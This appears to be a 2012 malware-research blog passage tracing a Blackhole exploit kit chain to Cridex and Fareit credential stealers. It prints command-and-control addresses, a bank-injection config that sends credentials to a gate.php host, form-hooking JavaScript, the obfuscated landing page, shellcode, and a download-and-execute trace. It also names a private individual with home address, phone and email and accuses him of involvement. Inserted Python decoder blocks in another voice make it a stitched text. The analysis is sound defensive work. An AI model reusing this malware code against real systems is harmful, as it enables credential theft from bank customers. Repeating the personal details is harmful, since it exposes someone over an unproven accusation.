(385): ***** At this point the malware process exp2.tmp.exe was started....
(394): try to establish conn to 74.207.237.170
(399): send ping to 209.190.61.50
(405): Communicating via HTTP/POST to 174.143.174.136:8080
(461): try to establish conn to 199.71.215.194 
(467): Communicating via HTTP/POST to 210.56.23.100:8080
(495): try to establish conn to 132.248.49.112
(500): try to establish conn to 74.117.61.66
(535): try to establish conn to 173.192.229.36
(541): Communicating via HTTP/POST to 69.64.89.82:8080
(571): try to establish conn to: 173.224.221.135
(577): try to establish conn to: 59.90.221.6
(583): try to establish conn to 180.235.150.72
(588): Communicating via HTTP/POST to 123.49.61.59:8080
(641): Communicating via HTTP/POST to 123.49.61.59:8080
(716): try to establish conn to 113.130.65.77
(721): try to establish conn to  180.235.150.72
(726): Communicating via HTTP/POST to 69.64.89.82:8080
Mr. EP_X0FF, the Global Moderator of KernelInfo, was cracking the code to find all the connection possibilities, as below:
hxxp://123.49.61.59:8080
hxxp://180.235.150.72:8080
hxxp://59.90.221.6:8080
hxxp://173.224.221.135:8080
hxxp://210.56.23.100:8080
hxxp://199.71.215.194:8080
hxxp://74.117.61.66:8080
hxxp://209.51.221.247:8080
hxxp://174.143.174.136:8080
hxxp://74.207.237.170:8080
hxxp://203.217.147.52:8080
hxxp://208.87.243.18:8080
hxxp://206.176.226.157:8080
With the below list of callbacks:
hxxp://132.248.49.112:8080/asp/intro.php         
hxxp://113.130.65.77:8080/asp/intro.php         
hxxp://203.113.98.131:8080/asp/intro.php         
hxxp://110.164.58.250:8080/asp/intro.php         
hxxp://200.108.18.158:8080/asp/intro.php         
hxxp://207.182.144.115:8080/asp/intro.php         
hxxp://148.208.216.70:8080/asp/intro.php         
hxxp://203.172.252.26:8080/asp/intro.php         
hxxp://202.6.120.103:8080/asp/intro.php         
hxxp://203.146.208.180:8080/asp/intro.php         
hxxp://207.126.57.208:8080/asp/intro.php         
hxxp://203.80.16.81:8080/asp/intro.php         
hxxp://202.180.221.186:8080/asp/intro.php

File activity

The exp2.tmp.exe at its first run makes your PC very slow, because it searches every possible path for data to steal; VirusTotal makes a good behavior file-access list here-->>[PASTEBIN] Snipped here:
\\.\PIPE\lsarpc (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\HWID (failed)
C:\WINDOWS\wcx_ftp.ini (failed)
C:\Documents and Settings\\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\All Users\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Local Settings\Application Data\GHISLER\wcx_ftp.ini (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat (failed)
C:\Documents and Settings\\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat (failed)

The Password Stealer Configurator

At this point in your registry at the below key:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\SD5809E24(←random)\:
A long string like this was saved:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 39 34 38 62 33 33 30 31 35 38 63 61 66 64 39 37 36 31 39 64 39 38 35 31 39 66 39 66 64 38 61 66 61 64 39 34 62 37 64 38 22 3E 3C 68 74 74 70 73 68 6F 74 73 3E 3C 75 72 6C 20 74 79 70 65 3D 22 64 65 6E 79 22 3E 5C 2E 28 63 73 73 7C 6A 73 29 28 24 7C 5C 3F 29 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 5C 2E 63 6F 6D 2F 6B 31 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 63 68 2F 3C 2F 75 72 6C 3E 3C 75 72 6C 20 63 6F 6E 74 65 6E 74 54 79 70 65 3D 22 5E 74 65 78 74 2F 28 68 74 6D 6C 7C 70 6C 61 69 6E 29 22 3E 2F 61 75 74 68 65 6E 74 69 63 61 74 69 6F 6E 2F 7A 62 66   
   :
6F 64 79 2E 2A 3F 3E 28 2E 2A 3F 29 5D 5D 3E 3C 2F 70 61 74 74 65 72 6E 3E 3C 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 21 5B 43 44 41 54 41 5B 3C 73 63 72 69 70 74 20 74 79 70 65 3D 22 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3D 22 68 74 74 70 3A 2F 2F 37 38 2E 31 35 39 2E 31 32 31 2E 31 32 38 3A 38 30 38 30 2F 69 70 63 6B 67 2F 67 61 74 65 2E 70 68 70 3F 62 6F 74 69 64 3D 52 49 4B 2D 31 33 37 39 43 46 33 37 43 32 35 5F 39 34 35 35 45 35 30 44 30 42 32 44 32 30 43 42 26 62 61 6E 6B 3D 62 61 6E 6B 6F 66 61 6D 65 72 69 63 61 22 3E 3C 2F 73 63 72 69 70 74 3E 5D 5D 3E 3C 2F 72 65 70 6C 61 63 65 6D 65 6E 74 3E 3C 2F 6D 6F 64 69 66 79 3E 3C 2F 61 63 74 69 6F 6E 73 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 3E 3C 2F 68 74 74 70 69 6E 6A 65 63 74 73 3E 3C 2F 73 65 74 74 69 6E 67 73 3E
Save that↑ as binary with a .TXT filename & you'll see this malware config as text; you'll see the bank/cash online sites, each connection with its credential path, and also some public https or ftp online sites. I saved the data here-->>[PASTEBIN] Thanks again to Mr. EP_X0FF, the Global Moderator of KernelInfo, who mentioned all of the software & credential paths sought here-->>[PASTEBIN] I counted 491 types of credentials being sought.. Back to this stealer configuration file: it has encryption before being sent by the POST method:
if(typeof window.EncryptPassword=='function')
{var fn=window.EncryptPassword;window.EncryptPassword=function(id)
  {
  try{var e=document.getElementById(id);
  var i=document.createElement("input");
  i.type="hidden";
  i.name="OPN";
  i.value=e.value;
document.Form1.appendChild(i);}
catch(e){}return fn(id);};}
There is also phishing for the credit card/online banking trap; the code is in the stealer configuration, something like this snippet:
      :
<span class="bodytext">
 Click "Next" to complete Identity verification process. 
</span>
<!-- END of art_SA_edu_edu_instr in DCTM ECP -->
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
        </tr>
        <tr>
          <td>
             </td>
          <td>
            <span class="bodytext">
              <label title="Go to Enter Card">
                
              </label>
            </span>
          </td>
        </tr>
        <tr>
          <td colspan="2">
             </td>
              :
I just saved the configuration data into HTML & ran it as a PoC, saved as this teststealer.html: see the path & filename well.. Then here we go... Hello American Express! Good Day Chase Bank! From what I confirmed in the configuration code, it sends stolen credentials to:
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=chase
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=wellsfargo
h00p://78.159.121.128:8080/ipckg/gate.php?botid=-YOUR-PC-ID-&bank=bankofamerica

Virus Total Detection Ratio

It's been more than 24hrs since I detected these messes, after the 1st disclosure here and there; let's see the detection ratio of these infectors below. The landing page:
SHA1: 35d9f1481132d8f1abdc1b2d3aa56cd1455f6656
MD5: a93bb29d6a3c3c04b1cb3dafc7cfc79f
File size: 90.1 KB ( 92310 bytes )
File name: operation_alert_login.php
File type: HTML
Detection ratio: 6 / 46
Analysis date: 2012-12-16 06:22:39 UTC ( 1 min ago )
URL -->>[CLICK]
MalwareName:
McAfee-GW-Edition : JS/Exploit-Blacole.gq
NANO-Antivirus : Trojan.Script.Expack.bcrxpa
McAfee : JS/Exploit-Blacole.gq
Fortinet : JS/Obfuscus.AACB!tr
TheHacker : JS/Feebs.gen@MM
AVG : JS/Redir
The Cridex trojan of password stealer downloader:
SHA1: d4bfbbd375da0ac775812bed2459ff908e1fb9ba
MD5: b360fec7652688dc9215fd366530d40c
File size: 132.0 KB ( 135168 bytes )
File name: info.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 26 / 45
Analysis date: 2012-12-16 01:28:28 UTC ( 5 hours, 5 min ago )
URL -->>[CLICK]
MalwareName:
MicroWorld-eScan : Trojan.Generic.KD.810285
McAfee : pws-ja!cm
Malwarebytes : Trojan.FakeMS
Symantec : W32.Cridex
Norman : W32/Suspicious_Gen4.BTZMQ
ESET-NOD32 : a variant of Win32/Kryptik.AQNJ
TrendMicro-HouseCall : TROJ_GEN.RCBCDLE
Avast : Win32:Dropper-MEA [Drp]
Kaspersky : Trojan.Win32.Bublik.wad
BitDefender : Trojan.Generic.KD.810285
Emsisoft : Trojan.Win32.Agent.AMN (A)
Comodo : TrojWare.Win32.Trojan.Agent.Gen
F-Secure : Trojan.Generic.KD.810285
DrWeb : Trojan.Necurs.97
VIPRE : Win32.Malware!Drop
AntiVir : TR/Bublik.wad
McAfee-GW-Edition : pws-ja!cm
Sophos : Troj/Agent-ZIT
Microsoft : Worm:Win32/Cridex.E
ViRobot : Trojan.Win32.A.Bublik.135168.S
GData : Trojan.Generic.KD.810285
PCTools : Malware.Cridex
Ikarus : Trojan-Spy.Agent
Fortinet : W32/Bublik.WAD!tr
AVG : Generic30.BIMO
Panda : Trj/Sinowal.WWG
The password stealer (fareit) trojan:
SHA1: 88bab6d7c0e98b1ee55110243251f562af399854
MD5: ce7474646297ed818bb8ed48f50c7e1e
File size: 120.0 KB ( 122880 bytes )
File name: exp2.tmp.ex_
File type: Win32 EXE
Tags: peexe
Detection ratio: 7 / 46
Analysis date: 2012-12-16 01:13:52 UTC ( 5 hours, 6 min ago )
URL -->>[CLICK]
MalwareName:
DrWeb : Trojan.PWS.Stealer.1656
VIPRE : Trojan.Win32.Kryptik.alry (v)
Emsisoft : Trojan.PSW.Win32.Tepfer.dazd.AMN (A)
Kaspersky : Trojan-PSW.Win32.Tepfer.dazd
Malwarebytes : Trojan.PWS
Kingsoft : Win32.Malware.Generic.a.(kcloud)
ViRobot : Trojan.Win32.A.PSW-Tepfer.122880.A
We can see that the landing page & password stealer (Fareit) STILL has low detection.

Samples

For the good guys, the samples & captured data are available. Samples --->>[HERE] Research Data (PCAP, RegShot) -->>[HERE] Cracked Data (deobfs'ed code, decrypted binaries (thanks to kernelmode!) etc) -->>[HERE]

Thank's to...

To all MalwareMustDie friends! Without you guys, I wouldn't have gotten this far :-) Blake (jsunpack), for inspiring the stealer configuration file. @Xylit0l & EP_X0FF of kernelmode, great thanks! YouTube, VirusTotal, MediaFire, Google & Blogger

Network Analysis..Tracing the Bad guys..

As requested, I investigated the NS used; it leads to someone.. Please bear with my text since I posted it via FreeBSD below:
//The domain used for the infector is 
eaglepointecondo.biz  900 IN  A  59.57.247.185
// ↑This is aiming US for sure (see the bank list, 75% are US banks)

// The SOA that was used (mark the TTL refresh time..)
primary name server = ns1.amishshoppe.net
responsible mail addr = (root)
serial  = 1355645102
refresh = 60 (1 min)
retry   = 120 (2 mins)
expire  = 1048576 (12 days 3 hours 16 mins 16 secs)
default TTL = 900 (15 mins) //←this!

//How it was root'ed: 
Tracing to eaglepointecondo.biz[a] via 202.238.95.24, maximum of 1 retries
202.238.95.24 (202.238.95.24) 
 |\___ a.gtld.biz [biz] (156.154.124.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ k.gtld.biz [biz] (156.154.128.65) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ f.gtld.biz [biz] (209.173.58.66) 
 |     |\___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |      \___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |\___ c.gtld.biz [biz] (156.154.127.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
 |\___ b.gtld.biz [biz] (156.154.125.65) 
 |     |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
 |      \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 
  \___ e.gtld.biz [biz] (156.154.126.65) 
       |\___ NS1.AMISHSHOPPE.NET [eaglepointecondo.biz] (209.140.18.37) Got authoritative answer 
        \___ NS2.AMISHSHOPPE.NET [eaglepointecondo.biz] (211.27.42.138) * 

//History of infector from 59.57.247.185 leads to:
eaglepointecondo.org  A  59.57.247.185
pleansantwille.com  A  59.57.247.185
eaglepointecondo.co  A  59.57.247.185
platinumbristol.net  A  59.57.247.185
eaglepointecondo.biz  A  59.57.247.185
sessionid0147239047829578349578239077.pl  A  59.57.247.185

//It uses Chinese IP:
ASN  |Prefix        |  ASName  |CN  |Domain    |ISP of an IP Address
4134 | 59.56.0.0/14 | CHINANET | CN | XMJL.COM | XIAMEN JINLONGLVXINGCHE FUJIAN PROVINCE

//PoC of this IP infection as additional evidence:
http://urlquery.net/search.php?q=59.57.247.185&type=string&start=2012-12-01&end=2012-12-16&max=300

// These moronz are using the DNS below:
ns1.amishshoppe.net.    3600    IN      A       209.140.18.37
ns2.amishshoppe.net.    3600    IN      A       211.27.42.138

// Those DNS Server are in US & Australia (should report this malicious use..)
ASN   |Prefix           |  ASName             | CN | Domain        | ISP of an IP Address
11042 | 209.140.16.0/22 | LANDIS-HOLDINGS-INC | US | NOCDIRECT.COM | LANDIS HOLDINGS INC
9443  | 211.27.32.0/20  | INTERNETPRIMUS-AS   | AU | PRIMUSTEL.COM | PRIMUS TELECOMMUNICATIONS

//Looks like they have full control of domain amishshoppe.net to control DNS:
PoC:
; <<>> DiG 9.8.1-P1 <<>> 209.140.18.37 axfr // Voila! no AXFR allowed means the NS must have been added directly.
;; global options: +cmd
; Transfer failed.
; <<>> DiG 9.8.1-P1 <<>> 211.27.42.138 axfr
;; global options: +cmd
; Transfer failed.

//This infector in WHOIS:
Domain Name:                                 EAGLEPOINTECONDO.BIZ
Domain ID:                                   D52418387-BIZ
Sponsoring Registrar:                        GODADDY.COM, INC.
Name Server:                                 NS1.AMISHSHOPPE.NET
Name Server:                                 NS2.AMISHSHOPPE.NET
Created by Registrar:                        GODADDY.COM, INC.
Last Updated by Registrar:                   GODADDY.COM, INC.
Domain Registration Date:                    Sat Dec 08 00:22:13 GMT 2012
Domain Expiration Date:                      Sat Dec 07 23:59:59 GMT 2013
Domain Last Updated Date:                    Mon Dec 10 19:12:41 GMT 2012

//VIA Strange proxy services....
Registrant Organization:                     Domains By Proxy, LLC
Registrant Address1:                         DomainsByProxy.com
Registrant Address2:                         14747 N Northsight Blvd Suite 111, PMB 309
Registrant City:                             Scottsdale
Registrant State/Province:                   Arizona
Registrant Postal Code:                      85260
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.4806242599
Registrant Facsimile Number:                 +1.4806242598

// some must start questioning Mr. Steve Burandt in US about this infection...
Domain Name: AMISHSHOPPE.NET
   Registrar: REGISTER.COM, INC.
   Whois Server: whois.register.com
   Referral URL: http://www.register.com
   Name Server: NS1.AMISHSHOPPE.NET
   Name Server: NS2.AMISHSHOPPE.NET
   Status: clientTransferProhibited
   Updated Date: 15-nov-2012  // <== JUST UPDATED!! #PoC Proved!! #w00t!
   Creation Date: 15-nov-2012
   Expiration Date: 15-nov-2013
   
   Registrant:
      Steve Burandt
      0n430 Peter Rd
      Winfield, IL 60190
      US
      Phone: +1.6304626711
      Email: solaradvent@yahoo.com
↑Strong accusation, I know, but the data said so.. Can't wait to hear the explanation from this person..

#MalwareMustDie!

Saturday, December 15, 2012

"More" Spam to BHEK to Cridex; How they define, grab, handle & send the credentials + more things that we really (don't) need to know...

*) Sorry friends, I wrote and did everything non-stop for 12hrs, so please bear
with my bad grammar since my brain seems to be starting to jam..

This post is about well-known bad actors that I always write about; I got many hints from everywhere (thanks @Hulk_Crusader, Dynamoo, etc.) that today's spam malvertisement has a direct link to the

h00p://myadmin.sp-host.ru/page4.htm
..or went to the hacked WordPress like the pic below; after clicking the marked link above, the user will be redirected to the
h00p://myadmin.sp-host.ru/page4.htm
What's inside is this HTML redirect code...
$ Xurl h00p://myadmin.sp-host.ru/page4.htm
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aviaonlolsio.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
...to the BHEK2 landing page below, which contains the obfuscated JS code
h00p://aviaonlolsio.ru:8080/forum/links/column.php
Ignoring the HTML code, the structure of that landing page's fuzzy code is as below:
//----------------------structure-------------------

// jar applet part.....
<applet archive="/forum/links/column.php?fubzjr=dgfxdx&vxsk=eauuz" code="hw">
<param name="val" value="Dyy3OjjVv8"/>
<param name="prime" value="Vto-t-i8twlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xt.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tR0b6.RSUbARMUb3" />
</applet>
<div></div>

// first part of the script...
dd="i";
if(document.getElementsByTagName("div")[0].style.left==="")
    {ss=String.fromCharCode;}
pp="eIn";

// scattered deobfs'd data under tag <i> from var 0,1,..,29
<i 
  0="-0kjh4k3-05ke5j2..."
  1=
  :
  :
 29="-7i1kjhk-9k3g38f..."
>

// second part of the script....
if(document.getElementsByTagName("d"+"iv")[0].style.left===""){a=document["getElementsB"+"yTagName"](dd);
a=a[0];
s=new String();
for(i=0;;i++){
 r=a.getAttribute(i);
 if(r){s=s+r;}else break;}
a=s;
s=new String();
e=window["eva"+"l"];
p=parseInt;
for(i=0;a.length>i;i+=2){
 if(a.substr(i,1)=="-")i+=2;
 if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));}
c=s;
e(c)}  
//-----------------------end of structure----------
Remember to always make things simple :-) Start by joining the scattered/deobfs'ed vars...
 dd="i";
 pp="eIn";
 if(document.getElementsByTagName("div")[0].style.left==="")
   {
   ss=String.fromCharCode;
   }
 if(document.getElementsByTagName("div")[0].style.left==="")
 {
   a=document["getElementsByTagName"](dd);
   a=a[0];
   s=new String();
   for(i=0;;i++)
   {
     r=a.getAttribute(i);
     if(r)
     {
       s=s+r;
     }
     else break;
   }
   a=s;
   s=new String();
   p=parseInt;
   for(i=0;a.length>i;i+=2)
   {
     if(a.substr(i,1)=="-")i+=2;
     if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));
   }
   c=s;
   eval(c)
 }
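The joined script above does two things: it concatenates the numbered attributes of the `<i>` tag in order, then decodes each two-character base-23 pair as `(parseInt(pair, 23) - 7) / 4` while skipping a `-` and the character after it. The block below is an added example, not code from the post or from the kit, that reproduces that decoding loop in Python so the attribute data can be decoded without running it in a browser or JS engine. The helper `encode_for_sample` and the dictionary `SAMPLE_I_TAG_ATTRS` are constructed here only to build a harmless fixture; the real tag decodes to the PluginDetect script the post links to. The string `-0kjh4k3-05ke5j2` is the start of attribute `0` as printed in the structure above.

```python
import itertools


def js_parse_int(s, base):
    """parseInt(s, base) semantics for digit characters: consume the leading
    run of valid digits, ignore the rest, and return None for NaN."""
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"[:base]
    value, seen = 0, False
    for ch in s.lower():
        d = alphabet.find(ch)
        if d < 0:
            break
        value, seen = value * base + d, True
    return value if seen else None


def gather_tag_attributes(attrs):
    """Mirror of the page's getAttribute(i) loop: concatenate attributes named
    "0", "1", "2", ... in order and stop at the first one that is missing."""
    joined = []
    for i in itertools.count():
        value = attrs.get(str(i))
        if value is None:
            break
        joined.append(value)
    return "".join(joined)


def decode_bhek_string(a):
    """Mirror of the page's loop:
         for(i=0;a.length>i;i+=2){ if(a.substr(i,1)=="-")i+=2;
                                    s=s+ss((p(a["substr"](i,2),23)-7)/4); }
    Each plaintext character is stored as two base-23 digits of charCode*4+7;
    a "-" and the character after it are filler and are skipped."""
    out = []
    i = 0
    while i < len(a):
        if a[i] == "-":
            i += 2
        pair = a[i:i + 2]
        if not pair:
            break
        n = js_parse_int(pair, 23)
        # String.fromCharCode(NaN) is "\x00"; otherwise the number is truncated
        # toward zero and reduced to 16 bits, as ToUint16 does.
        out.append("\x00" if n is None else chr(int((n - 7) / 4) & 0xFFFF))
        i += 2
    return "".join(out)


def deobfuscate_landing_page(attrs):
    """Full pipeline: gather the scattered attributes, then decode.
    The original page hands the result to eval(); here it is only returned."""
    return decode_bhek_string(gather_tag_attributes(attrs))


# --- constructed fixture (not from the post) -------------------------------
BASE23_DIGITS = "0123456789abcdefghijklm"


def encode_for_sample(text, filler_every=5):
    """Inverse of decode_bhek_string, used only to build the sample below;
    inserts a two-character "-0" filler every few characters."""
    pieces = []
    for n, ch in enumerate(text):
        v = ord(ch) * 4 + 7
        if v >= 23 * 23:
            raise ValueError("only ASCII fits in two base-23 digits")
        if n % filler_every == 0:
            pieces.append("-0")
        pieces.append(BASE23_DIGITS[v // 23] + BASE23_DIGITS[v % 23])
    return "".join(pieces)


def split_into_attributes(encoded, width=8):
    """Scatter the encoded string over numbered attributes, like <i 0=".." 1="..">."""
    return {str(n): encoded[j:j + width]
            for n, j in enumerate(range(0, len(encoded), width))}


SAMPLE_PLAINTEXT = 'var pd = "PluginDetect"; // decoded stage'
SAMPLE_I_TAG_ATTRS = split_into_attributes(encode_for_sample(SAMPLE_PLAINTEXT))

if __name__ == "__main__":
    print(deobfuscate_landing_page(SAMPLE_I_TAG_ATTRS))
```

Decoding the fragment of the real attribute that is visible above gives `var Pl`, consistent with the PluginDetect script the post recovers; a decoder that reproduces the arithmetic exactly (including parseInt's prefix parsing and fromCharCode's truncation) is what lets you compare output against what the browser would have executed.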
And pump in the i tag values as they are & run it in your Rhino or SpiderMonkey (JavaScript engines/emulators) to get the Plugin Detect here --->>[PASTEBIN] Straight to the point, let's crack the shellcode parts: see the function getShellCode() part, and change the function into the usual drill below:
var a = "8200!%8582!%2551!%e0c4!%51f4!%1525!%34e0!%5191!%e054!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%74e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%14
  :
  :
!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e90!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
x= a["replace"](/\%!/g, "%" + "u");
document.write(x);
↑Run it & you'll get the shellcode after stripping the "%u" strings from the run's result..
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 09 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
          :                       :                    :
58 40 58 17 47 4e 15 1b  18 12 19 46 12 19 41 12  X@X.GN.....F..A.
19 41 12 1b 1b 0e 59 4d  15 1a 5e 12 19 43 12 19  .A....YM..^..C..
45 12 1b 1a 12 1b 1b 12  19 43 12 19 43 12 1b 19  E........C..C...
12 19 42 12 19 47 0e 45  15 19 43 0e 51 52 15 4f  ..B..G.E..C.QR.O
0e 4c 52 15 58 28 28 00                           .LR.X((.
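The storage format used by getShellCode() is the shellcode written as `%uXXXX` escapes, with `%u` swapped for `%!` and the whole string reversed. The block below is an added example, not code from the post or from the kit, that undoes those steps and lays each 16-bit unit out little-endian, as the browser's unescape() would place it in memory, then runs the quick printable-strings check the post makes before deciding to disassemble. `PAGE_FRAGMENT` is the first four units of the blob printed above, which the dump above shows as its last eight bytes; `SAMPLE_BLOB` is a constructed fixture built from a harmless byte string by the helper `encode_for_sample`.

```python
import re
import struct


def decode_reversed_percent_u(blob):
    """Reverse the stored string, turn "%!" back into "%u", and unescape each
    %uXXXX into one UTF-16 code unit stored as two little-endian bytes.
    Anything that is not a %uXXXX unit is ignored, so a snipped blob still
    decodes as far as it goes."""
    forward = blob[::-1].replace("%!", "%u")
    units = re.findall(r"%u([0-9a-fA-F]{4})", forward)
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)


def hexdump(data, width=16):
    """Render bytes in the offset / hex / ASCII layout the post uses."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}  {hexpart:<{width * 3 - 1}}  {ascii_part}")
    return lines


def ascii_strings(data, min_len=4):
    """Printable ASCII runs of at least min_len bytes: if no URL shows up here
    the payload address is encoded and only disassembly will reveal it."""
    return [m.decode("ascii")
            for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Taken from the post: the first four units of its reversed blob.
PAGE_FRAGMENT = "8200!%8582!%2551!%e0c4!%"


def encode_for_sample(data):
    """Inverse of decode_reversed_percent_u; used only to build the fixture."""
    if len(data) % 2:
        data += b"\x00"
    units = [struct.unpack("<H", data[i:i + 2])[0] for i in range(0, len(data), 2)]
    forward = "".join(f"%u{u:04x}" for u in units)
    return forward.replace("%u", "%!")[::-1]


# Constructed sample (not from the post): a NOP-like run followed by text.
SAMPLE_BLOB = encode_for_sample(b"\x90\x90\x90\x90MalwareMustDie\x00\x00")

if __name__ == "__main__":
    for line in hexdump(decode_reversed_percent_u(PAGE_FRAGMENT)):
        print(line)
    print(ascii_strings(decode_reversed_percent_u(SAMPLE_BLOB)))
```

The byte order matters when comparing with a debugger: `%u4c0e` is the code unit 0x4c0e, which the post's dump shows as `0e 4c`, so a decoder that emits the hex digits in the order they are written would produce shellcode that never matches what ran.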
It looks like the payload URL is not visible unless we disassemble this, so let's disassemble it (use whichever shellcode analyzer tools you prefer)
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
So we got the payload url here:
h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p
This time I just ran it in my test PC browser & downloaded & played with it, getting downloads with varied names like the pics below: *) If you would like to grab it in a safer mode, see previous posts pls. All of them are actually the same file:
about.exe     06c032711f0cfae2c443b3926253b296
contacts.exe  06c032711f0cfae2c443b3926253b296
info.exe      06c032711f0cfae2c443b3926253b296
readme.exe    06c032711f0cfae2c443b3926253b296

A quick binary analysis

In short, like usual, it is a Cridex trojan password stealer. Let's peek at the PE info (not much info though)
$ ls -alF ./sample
-rwx------   1 xxxx xxxx 120320 Dec 14 09:38 ./sample*

// hex
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
